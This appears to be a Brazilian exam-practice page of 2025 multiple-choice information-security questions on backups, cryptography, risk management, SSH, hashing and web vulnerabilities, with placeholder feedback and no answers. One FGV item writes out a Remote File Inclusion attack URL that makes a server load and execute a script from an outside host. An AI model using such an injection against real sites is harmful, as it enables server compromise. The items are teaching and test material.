Questões de Provas - Questões de Concursos - Página 4

Q3181000

Ano: 2025 Banca: INAZ do Pará Órgão: Prefeitura de Bocaina do Sul - SC Prova: INAZ do Pará - 2025 - Prefeitura de Bocaina do Sul - SC - Monitor de Informática |

Q3181000 Segurança da Informação

Em uma organização com alto volume de dados, o administrador implementou um sistema de backup incremental para otimizar o armazenamento e minimizar o tempo necessário para o processo. Ele também configurou permissões de pastas em níveis hierárquicos, assegurando que cada setor acessasse apenas os arquivos relacionados às suas atividades. Durante um teste, foi identificado que um arquivo excluído acidentalmente por um usuário padrão não estava disponível na Lixeira do sistema.

Sobre as práticas de gerenciamento de arquivos e backup nesse cenário, assinale a alternativa CORRETA.

A

Arquivos excluídos por usuários com permissões padrão podem ser recuperados diretamente de backups configurados previamente.

B

Backups incrementais são menos eficientes do que backups completos, pois armazenam cópias integrais dos dados sempre que executados.

C

Permissões em níveis hierárquicos só podem ser configuradas em sistemas de armazenamento na nuvem, como Google Drive ou OneDrive.

D

A ausência de um arquivo na lixeira indica falha do sistema operacional na aplicação das permissões hierárquicas configuradas.

E

Backups incrementais não são recomendados em sistemas corporativos, pois complicam a recuperação de dados em caso de falhas.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3178704

Ano: 2025 Banca: FUNDATEC Órgão: Prefeitura de Porto Alegre - RS Prova: FUNDATEC - 2025 - Prefeitura de Porto Alegre - RS - Auditor Fiscal da Receita Municipal - Bloco II |

Q3178704 Segurança da Informação

Em uma transação bancária online, garantir que as informações transmitidas sejam confidenciais e que apenas o destinatário possa acessá-las é essencial para a segurança. A criptografia de chave pública desempenha um papel importante nesse processo, utilizando um par de chaves para proteger os dados. Com base nesse contexto, analise as assertivas abaixo:

I. A chave pública é usada para criptografar a mensagem, e a chave privada é utilizada para decriptá-la, garantindo que apenas o destinatário pretendido consiga ler os dados.

II. RSA e ECC são abordagens amplamente utilizadas em criptografia de chave pública devido à sua capacidade de fornecer segurança com diferentes tamanhos de chave.

III. A criptografia de chave pública é mais eficiente em termos de processamento do que a criptografia simétrica, especialmente para grandes volumes de dados.

Quais estão corretas?

A

Apenas I.

B

Apenas III.

C

Apenas I e II.

D

Apenas II e III.

E

I, II e III.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3178541

Ano: 2025 Banca: FUNDATEC Órgão: Prefeitura de Tangará da Serra - MT Prova: FUNDATEC - 2025 - Prefeitura de Tangará da Serra - MT - Técnico em Informática |

Q3178541 Segurança da Informação

Referente à gestão de riscos em segurança da informação, analise as assertivas abaixo:

I. A análise de riscos envolve a identificação e avaliação dos riscos que podem impactar a segurança da informação.

II. O tratamento de risco pode incluir medidas para mitigar, transferir, aceitar ou evitar o risco.

III. O risco residual é o risco que permanece após a implementação de medidas de tratamento de risco.

Quais estão corretas?

A

Apenas I.

B

Apenas II.

C

Apenas I e III.

D

I, II e III.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3178539

Ano: 2025 Banca: FUNDATEC Órgão: Prefeitura de Tangará da Serra - MT Prova: FUNDATEC - 2025 - Prefeitura de Tangará da Serra - MT - Técnico em Informática |

Q3178539 Segurança da Informação

Em relação às definições de incidentes de segurança da informação, analise as assertivas abaixo:

I. Um incidente de segurança é qualquer evento que ameaça a confidencialidade, integridade ou disponibilidade da informação.
II. Incidentes de segurança podem ser causados por ações deliberadas ou acidentais.
III. Todos os incidentes de segurança resultam em perda de dados.

Quais estão corretas?

A

Apenas I.

B

Apenas II.

C

Apenas III.

D

Apenas I e II.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3178538

Ano: 2025 Banca: FUNDATEC Órgão: Prefeitura de Tangará da Serra - MT Prova: FUNDATEC - 2025 - Prefeitura de Tangará da Serra - MT - Técnico em Informática |

Q3178538 Segurança da Informação

O não repúdio, em segurança da informação, é a:

A

Capacidade de garantir que uma entidade não possa negar a autoria de uma ação.

B

Habilidade de proteger os dados contra acessos não autorizados.

C

Proteção dos dados contra modificações não autorizadas.

D

Garantia de que os sistemas estão sempre disponíveis.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3176976

Ano: 2025 Banca: FURG Órgão: FURG Prova: FURG - 2025 - FURG - Técnico de Tecnologia da Informação - Área: Serviços de Rede |

Q3176976 Segurança da Informação

A Norma Complementar nº 20/IN01/DSIC/GSIPR estabelece diretrizes para o processo de tratamento da informação nos órgãos da Administração Pública Federal. Assinala a afirmativa que está relacionada à proteção da informação durante todo o seu ciclo de vida.

A

Garantir apenas a integridade dos dados.

B

Implementar mecanismos de proteção apenas para informações sigilosas.

C

Estabelecer critérios de auditoria obrigatórios apenas em órgãos de segurança nacional.

D

Garantir que a informação produzida, recepcionada ou custodiada não seja identificada para manter sua privacidade.

E

Classificar a informação, controlar acesso e adotar medidas de segurança em todas as fases.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3176975

Ano: 2025 Banca: FURG Órgão: FURG Prova: FURG - 2025 - FURG - Técnico de Tecnologia da Informação - Área: Serviços de Rede |

Q3176975 Segurança da Informação

Analisa as afirmativas abaixo sobre a Norma Complementar nº 08/IN01/DSIC/GSIPR, que estabelece diretrizes para o gerenciamento de incidentes em redes computacionais na Administração Pública Federal. quanto aos processos que devem ser implementados para o gerenciamento de incidentes.
I. Exclusão imediata dos registros de incidentes após a solução do problema para evitar sobrecarga de sistemas.
II. Manutenção de equipes de resposta apenas durante o horário comercial, exceto em casos de ataques críticos.
III. Registro detalhado de incidentes para análise posterior, comunicação com partes interessadas e melhoria contínua dos procedimentos.
IV. Implementação de medidas punitivas automáticas contra possíveis agressores sem investigação formal.
Está(ão) correta(s) a(s) afirmativa(s):

A

Apenas IV.

B

Apenas I e II.

C

Apenas III.

D

Apenas I e III.

E

Todas as afirmativas.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3176974

Ano: 2025 Banca: FURG Órgão: FURG Prova: FURG - 2025 - FURG - Técnico de Tecnologia da Informação - Área: Serviços de Rede |

Q3176974 Segurança da Informação

Analisa as afirmativas abaixo sobre a Norma Complementar nº 05/IN01/DSIC/GSIPR, que disciplina a criação de Equipes de Tratamento e Respostas a Incidentes (ETIR) na Administração Pública Federal.
São atribuições típica dessas equipes:
I. Armazenar informações pessoais de cidadãos sem consentimento.
II. Prevenir e detectar incidentes de segurança em redes computacionais.
III. Coordenar ações de resposta a incidentes de segurança.
IV. Comunicar incidentes ao Gabinete de Segurança Institucional da Presidência da República.
Está(ão) incorreta(s) a(s) afirmativa(s):

A

Apenas IV.

B

Apenas I e II.

C

Apenas III e IV.

D

Apenas I.

E

Todas as afirmativas.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3176969

Ano: 2025 Banca: FURG Órgão: FURG Prova: FURG - 2025 - FURG - Técnico de Tecnologia da Informação - Área: Serviços de Rede |

Q3176969 Segurança da Informação

O protocolo Secure Shell (SSH) é amplamente utilizado para acesso remoto seguro a servidores e a dispositivos de rede. Em relação ao SSH, assinala a afirmativa correta.

A

O SSH utiliza criptografia para garantir a confidencialidade e a integridade dos dados transmitidos.

B

Para garantir segurança, o SSH não permite tunelamento de portas locais ou remotas.

C

O protocolo SSH foi projetado, exclusivamente, para transferir arquivos entre servidores e não suporta acesso remoto.

D

O SSH utiliza exclusivamente o protocolo UDP para comunicação segura.

E

No SSH, a autenticação nunca pode ser feita utilizando chaves públicas e apenas senhas são aceitas.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3176952

Ano: 2025 Banca: FURG Órgão: FURG Prova: FURG - 2025 - FURG - Técnico de Tecnologia da Informação - Área: Serviços de Rede |

Q3176952 Segurança da Informação

Sobre o conceito de hash, assinala a afirmativa correta.

A

O algoritmo SHA-256 é utilizado para encriptar dados.

B

Ao considerar um arquivo com o mesmo conteúdo, mas em sistemas operacionais diferentes, o seu hash pode variar conforme o sistema operacional utilizado.

C

O hash de um arquivo não sofrerá alterações se o tamanho do arquivo permanecer igual após as alterações de conteúdo.

D

É um código criptográfico, em que uma sequência de caracteres de tamanho variável é gerada por meio de uma entrada de tamanho fixo.

E

Consiste em uma função matemática onde é possível, por meio de uma entrada de tamanho variável, gerar uma sequência de caracteres de tamanho fixo.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3175756

Ano: 2025 Banca: FUNDATEC Órgão: Prefeitura de Tangará da Serra - MT Prova: FUNDATEC - 2025 - Prefeitura de Tangará da Serra - MT - Analista de Sistemas |

Q3175756 Segurança da Informação

Assinale a alternativa que corresponde a um tipo de ataque a redes de computadores cujo objetivo é realizar buscas detalhadas em redes, com o propósito de descobrir informações sobre programas ou serviços de computadores ativos.

A

Scan.

B

Ransonware.

C

Phishing.

D

DoS.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3175754

Ano: 2025 Banca: FUNDATEC Órgão: Prefeitura de Tangará da Serra - MT Prova: FUNDATEC - 2025 - Prefeitura de Tangará da Serra - MT - Analista de Sistemas |

Q3175754 Segurança da Informação

A Infraestrutura de Chaves Públicas Brasileira (ICP-Brasil) é uma cadeia hierárquica de confiança que viabiliza a emissão de certificados digitais para identificação virtual do cidadão. No ecossistema da ICP-Brasil, o ente responsável por emitir, distribuir, renovar, revogar e gerenciar certificados digitais é chamado de:

A

Autoridade Certificadora (AC).

B

Autoridade de Registro (AR).

C

Prestador de Serviço de Suporte (PSS).

D

Prestador de Serviço Biométrico (PSBio).

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3175753

Ano: 2025 Banca: FUNDATEC Órgão: Prefeitura de Tangará da Serra - MT Prova: FUNDATEC - 2025 - Prefeitura de Tangará da Serra - MT - Analista de Sistemas |

Q3175753 Segurança da Informação

Segundo a Norma ISO/IEC 27002:2013, são controles relacionados à gestão de ativos, EXCETO:

A

Procedimentos para o tratamento dos ativos devem ser desenvolvidos e implementados de acordo com o esquema de classificação da informação adotado pela organização.

B

A informação deve ser classificada em termos dos requisitos legais, valor, criticidade e sensibilidade para divulgação ou modificação não autorizada.

C

O acesso à informação e às funções de sistemas aplicativos deve ser restrito de acordo com a política de controle de acesso.

D

Mídias devem ser descartadas de forma segura, usando procedimentos formais quando não forem mais necessárias.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3175751

Ano: 2025 Banca: FUNDATEC Órgão: Prefeitura de Tangará da Serra - MT Prova: FUNDATEC - 2025 - Prefeitura de Tangará da Serra - MT - Analista de Sistemas |

Q3175751 Segurança da Informação

Qual é o protocolo de rede que provê serviços do protocolo TCP aprimorados com serviços de segurança, tais como: sigilo, integridade dos dados, autenticação do servidor e autenticação do cliente?

A

IDS.

B

NAT.

C

RSA.

D

SSL.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3175750

Ano: 2025 Banca: FUNDATEC Órgão: Prefeitura de Tangará da Serra - MT Prova: FUNDATEC - 2025 - Prefeitura de Tangará da Serra - MT - Analista de Sistemas |

Q3175750 Segurança da Informação

Sobre o uso de DMZ (Demilitarized Zone) em uma organização, é INCORRETO afirmar que:

A

É uma sub-rede que fica entre a internet pública e a rede privada.

B

Possibilita que a rede pública inicie conexões diretamente com a rede privada.

C

Permite que a organização acesse redes não confiáveis, como a internet, garantindo que a rede privada permanecerá segura.

D

Usa firewalls para filtrar o tráfego.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3174951

Ano: 2025 Banca: FGV Órgão: TCE-RR Prova: FGV - 2025 - TCE-RR - Analista Administrativo - Tecnologia da Informação, com especialidade em Desenvolvimento de Sistemas |

Q3174951 Segurança da Informação

A página web da sociedade empresária Exemplo1234, disponível na internet, permite que internautas acessem o edital de uma vaga de trabalho por meio do endereço eletrônico http://empresa1234.com/vaga.php?file=vaga.pdf.
Durante a verificação de vulnerabilidades contratada por essa empresa, foi observado que o servidor da página web da Empresa1234 processava o valor fornecido no parâmetro file sem realizar validação ou sanitização adequada.
Como resultado, foi possível incluir e executar no servidor o conteúdo de um arquivo malicioso hospedado no endereço http://testevulnerabilidade.com/badpage.php
O teste foi realizado utilizando o seguinte endereço:
http://empresa1234.com/vaga.php?file=http://testevulnerabilida de.com/badpage.php
Ao acessar essa URL, o conteúdo do arquivo badpage.php foi carregado e executado diretamente pelo servidor da Empresa1234, comprometendo sua segurança.
O tipo de vulnerabilidade presente no servidor de página da Empresa1234 é o

A

LFI – Local File Inclusion.

B

XSS – Cross-Site Scripting.

C

SQL Injection.

D

RFI – Remote File Inclusion.

E

FPD – Full Path Disclosure.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3174950

Ano: 2025 Banca: FGV Órgão: TCE-RR Prova: FGV - 2025 - TCE-RR - Analista Administrativo - Tecnologia da Informação, com especialidade em Desenvolvimento de Sistemas |

Q3174950 Segurança da Informação

Durante uma auditoria no setor de TI de TCE-RR, foi constatado que os analistas estavam utilizando criptografia por chave pública para o envio de informações confidenciais. Para garantir que os dados sejam protegidos contra acessos não autorizados, cada servidor precisa configurar corretamente as chaves de criptografia antes de iniciar a troca de mensagens.
Com base no funcionamento da criptografia assimétrica, sobre o processo de envio de uma mensagem criptografada é correto afirmar que

A

o remetente deve gerar um par de chaves, enviar sua chave privada ao destinatário e encriptar os dados usando sua própria chave pública.

B

o remetente deve encriptar a mensagem utilizando a chave pública do destinatário e manter sua chave privada protegida para garantir a segurança na decriptação.

C

o destinatário deve compartilhar sua chave privada com o remetente para que este possa utilizá-la no processo de encriptação e garantir a confidencialidade da mensagem.

D

o remetente e o destinatário devem compartilhar uma chave pública comum e utilizá-la tanto para encriptar quanto para descriptografar as mensagens.

E

o remetente deve encriptar a mensagem utilizando a chave privada do destinatário e manter sua chave pública protegida para garantir a segurança na decriptação.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3174948

Ano: 2025 Banca: FGV Órgão: TCE-RR Prova: FGV - 2025 - TCE-RR - Analista Administrativo - Tecnologia da Informação, com especialidade em Desenvolvimento de Sistemas |

Q3174948 Segurança da Informação

Analistas do TCE-RR utilizavam uma plataforma web interna para registrar auditorias. Durante a análise de segurança, foi detectado que áreas de entrada de texto na plataforma, usadas para registrar observações em relatórios, continham código malicioso armazenado no servidor.
Esse código era executado automaticamente no navegador de qualquer funcionário que visualizasse os relatórios, redirecionando-os para sites fraudulentos.
Nesse contexto, o ataque foi identificado como

A

injeção de código em XML (XML Injection).

B

injeção de código por buffer overflow.

C

Cross-Site Scripting (XSS) persistente.

D

Cross-Site Scripting (XSS) refletido.

E

Cross-Site Scripting (XSS) baseado em DOM.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3174804

Ano: 2025 Banca: FGV Órgão: TCE-RR Prova: FGV - 2025 - TCE-RR - Analista Administrativo - Tecnologia da Informação, com especialidade em Banco de Dados |

Q3174804 Segurança da Informação

A criptografia dos dados em diferentes estados vem sendo utilizada tanto para garantir a segurança quanto para prevenir possíveis vazamentos de informações sensíveis.
No contexto de segurança de banco de dados, avalie as afirmativas a seguir.

I. O protocolo HTTPS, bem como outros similares, tem se tornado default para APIs na nuvem modernas.
II. Criptografia de disco completo em laptops são essenciais para proteger dados em caso de roubo do dispositivo.
III. Todas as formas de dados armazenados, incluindo dados em servidores, sistemas de arquivos, bancos de dados e armazenamento em nuvem, devem ser criptografadas para proteger contra acessos não autorizados.

Acerca do estado dos dados nas três afirmativas, é correto afirmar que

A

I e II correspondem à criptografia de dados em repouso e III, a criptografia de dados em trânsito.

B

I, II e III fazem referência à criptografia de dados em trânsito.

C

I fala sobre criptografia de dados em trânsito, II e III falam sobre criptografia de dados em repouso.

D

I e III correspondem à criptografia de dados em repouso e II, à criptografia de dados em trânsito.

E

I e II correspondem à criptografia de dados em trânsito e III, à criptografia de dados em repouso.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Q3174798

Ano: 2025 Banca: FGV Órgão: TCE-RR Prova: FGV - 2025 - TCE-RR - Analista Administrativo - Tecnologia da Informação, com especialidade em Banco de Dados |

Q3174798 Segurança da Informação

Suponha que o TCE-RR adote a estratégia de backup diferencial, com execução diária, e realize um backup completo apenas uma vez por semana. No quinto dia após o backup completo, um incidente ocorre algumas horas depois da execução do backup diferencial diário, que foi realizado com sucesso, exigindo a restauração dos dados para o ponto mais recente possível.
Sobre o processo de recuperação nesse caso, assinale a afirmativa correta.

A

Apenas o backup completo é necessário para restaurar os dados até o ponto mais recente.

B

É necessário restaurar o backup completo e todos os diferenciais realizados até o quinto dia.

C

Apenas o backup diferencial do quinto dia é necessário para restaurar os dados até o ponto mais recente.

D

O backup completo e o backup diferencial do quinto dia são necessários para a restauração dos dados até o ponto mais recente.

E

Todos os backups diferenciais realizados até o quinto dia devem ser restaurados em sequência, na ordem de criação.

Você errou! Resposta:

teste

Parabéns! Você acertou!

teste

Quer um estudo ilimitado?

Quer um estudo ilimitado?

Questões de Concurso

Foram encontradas 10.458 questões

Resolva questões gratuitamente!

, continue estudando de graça!